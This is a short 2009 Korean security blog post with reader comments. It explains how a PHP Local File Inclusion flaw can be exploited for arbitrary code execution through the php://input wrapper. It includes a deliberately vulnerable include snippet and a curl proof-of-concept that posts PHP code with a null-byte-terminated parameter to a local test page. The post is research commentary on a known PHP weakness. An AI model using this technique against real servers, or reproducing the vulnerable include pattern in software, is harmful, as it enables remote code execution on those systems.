이글루스
|
로그인
Xeraph@NCHOVY
www.xeraph.com
php://를 이용한 실행 방법
학술
by
xeraph
2009/10/26 16:30
www.xeraph.com/5105945
덧글수 :
3
Local File Inclusion 취약점이 있다면 아래와 같은 방법으로 편하게 임의의 코드 실행을 할 수 있을듯.. allow_url_fopen, allow_url_include 다 꺼놔도 되는 것 같은데.. (5.1.6 테스트) 물론 :// 필터링을 안 해놓은 경우에만 (..)
<?
$g4['t'] = $_GET['t'];
include "$g4[t]aaa";
?>
curl -d "<? print 'raph raph mineral'; ?> " "http://localhost/test.php?t=php://input%00"
PHP는 역시 아무도 모르게 뒷문 만들어놓은게 많은듯.. -_-
http://blog.php-security.org/archives/45-PHP-5.2.0-and-allow_url_include.html
http://swbae.egloos.com/1860954
포스트 메타 정보
퍼블리싱 및 추천
퍼블리싱 및 추천 정보가 없습니다.
같은 카테고리의 글
트랙백
이 글과 관련된 글 쓰기 (트랙백 보내기)
TrackbackURL :
http://www.xeraph.com/tb/5105945
[
도움말
]
덧글
최종욱
2009/10/28 00:33
#
답글
이, 이자식들 뭡니까 이거...;
xeraph
2009/10/28 00:34
#
자매품 data uri도 있다고 하죠 (..)
최종욱
2009/10/28 00:39
#
뭔가 php 너무 말랑말랑하군요... 안 좋은 의미에서 ㅠㅜ
댓글 입력 영역
닉네임
비밀번호
블로그
로그인
비공개
다음글 :
zone-h
이전글 :
Local File Inclusion – Tricks of the Trade
방명록
포토로그
프로필
엔초비 보안과 개발 이야기 (주로 크라켄 문어발 개발)
by
xeraph
검색
블로그내 검색 영역
카테고리
전체
(3684)
NCHOVY
(566)
잡담
(1781)
학술
(691)
코드
(83)
지름
(69)
그림
(27)
연주
(57)
번역
(28)
일
(301)
크라켄북
(1)
미분류
(80)
최근 덧글
와우 정리 잘하셨네요 ㅋ 좀 퍼갈께요
by 제임스
01/31
처음 외곽선은 잘그으셨는데 그 기초에 맞게 눈..
by 11233
12/30
업로드해놨습니다~
by xeraph
12/20
유진 씨가 만든 튜토리얼 문서 = 열리지 않네요...
by cc attack
12/20
헉! 뇌수막염 덜덜덜... 많이 아프셨었나 보군요..
by Kevin
12/17
수년전쯤 Joshua Bloch 이 URL의 equals는 I..
by Kevin
12/17
병맛 돋네
by 에디
12/16
ㄷㄷㄷㄷ 저게 좀 오래된 issue라지(...)
by scynuri
12/16
화이팅~
by 토깽
12/14
여기도 좋아요 달아요 ㅋㅋㅋ 좋다고 어떻게 표현..
by 고르엡
12/14
최근 트랙백
Fast-Flux 도메인 탐지
NCHOVY 인터넷 스톰 센터
01/18
Reversing 연구 blog
밤벌레's root@ ::
05/14
Packet Format Cheatsheets
컴퓨터는 거짓말을 하지..
03/31
태그
kraken
ldap
lisp
websocket
filemon
dhcp
radius
kraken-iptables
kraken-webconsole
fortigate
kraken-pcap
kraken-jython
kraken-msn-sniffer
kraken-http-sniffer
kraken-http-decoder
kraken-core
kraken-sleepproxy
zip
exploit-pcap
jldap
kraken-http-rule
kraken-maldomain
maven
openldap
kraken-siem
kraken-radius
scp
내이글루결산
봄봄
cassandra
태그 전체보기
RSS
이글루스 로고
이글루링크 추가하기
(
)을(를)
이글루링크로 추가하시겠습니까? 추가하시려면 그룹선택을 하세요.
(그룹선택 하지 않는 경우, 최상단 목록에 추가됩니다.)
그룹선택 :
그룹선택없음
덧글
최종욱 2009/10/28 00:33 # 답글
이, 이자식들 뭡니까 이거...;
xeraph 2009/10/28 00:34 #
자매품 data uri도 있다고 하죠 (..)
최종욱 2009/10/28 00:39 #
뭔가 php 너무 말랑말랑하군요... 안 좋은 의미에서 ㅠㅜ